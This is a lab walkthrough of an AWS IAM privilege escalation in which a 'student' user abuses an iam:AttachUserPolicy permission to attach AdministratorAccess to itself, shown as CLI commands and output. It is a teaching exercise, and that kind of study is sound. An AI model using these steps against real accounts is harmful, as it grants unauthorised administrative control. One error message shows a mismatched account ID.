Overly permissive permission I

Overly Permissive Permission can be abused by a user to perform privileged operations.

Objective: Leverage the policy attached to the student user and attain administrative privileges on the AWS account.

  1. Get access to AWS lab credentials.

  2. Configure AWS CLI.

  3. Check identity with:

aws sts get-caller-identity

  1. List the policies attached to the student user:

aws iam list-attached-user-policies --user-name student

  1. Check policy details for the Service policy:

aws iam get-policy --policy-arn arn:aws:iam::862839114976:policy/Service

  1. View policy details for the v1 version of Service policy:

┌──(kali㉿kali)-[~]
└─$ aws iam get-policy-version --policy-arn arn:aws:iam::862839114976:policy/Service --version-id v1
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": "iam:AttachUserPolicy",
                    "Effect": "Allow",
                    "Resource": "arn:aws:iam::*:user/*"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2023-05-11T09:02:39+00:00"
    }
}

  1. Try creating a new user, named bob:

┌──(kali㉿kali)-[~]
└─$ aws iam create-user --user-name Bob

An error occurred (AccessDenied) when calling the CreateUser operation: User: arn:aws:iam::527058492733:user/student is not authorized to perform: iam:CreateUser on resource: arn:aws:iam::527058492733:user/Bob because no identity-based policy allows the iam:CreateUser action

FAIL.

  1. Get AdministratorAccess policy arn:

┌──(kali㉿kali)-[~]
└─$ aws iam list-policies | grep 'AdministratorAccess'
            "PolicyName": "AdministratorAccess",
            "Arn": "arn:aws:iam::aws:policy/AdministratorAccess",
            "PolicyName": "AdministratorAccess-Amplify",
            "Arn": "arn:aws:iam::aws:policy/AdministratorAccess-Amplify",
            "PolicyName": "AWSAuditManagerAdministratorAccess",
            "Arn": "arn:aws:iam::aws:policy/AWSAuditManagerAdministratorAccess",
            "PolicyName": "AdministratorAccess-AWSElasticBeanstalk",
            "Arn": "arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk",

  1. Attach administrator policy to the current user:

┌──(kali㉿kali)-[~]
└─$ aws iam attach-user-policy --user-name student --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

  1. Check with:

┌──(kali㉿kali)-[~]
└─$ aws iam list-attached-user-policies --user-name student
{
    "AttachedPolicies": [
        {
            "PolicyName": "AdministratorAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"
        },
        {
            "PolicyName": "IAMReadOnlyAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/IAMReadOnlyAccess"
        },
        {
            "PolicyName": "Service",
            "PolicyArn": "arn:aws:iam::862839114976:policy/Service"
        }
    ]
}

  1. Try creating a new user named Bob again:

┌──(kali㉿kali)-[~]
└─$ aws iam create-user --user-name Bob
{
    "User": {
        "Path": "/",
        "UserName": "Bob",
        "UserId": "AIDA4RZJYBTQHLY5KDFRX",
        "Arn": "arn:aws:iam::862839114976:user/Bob",
        "CreateDate": "2023-05-11T09:11:37+00:00"
    }
}

Successfully performed a privileged operation.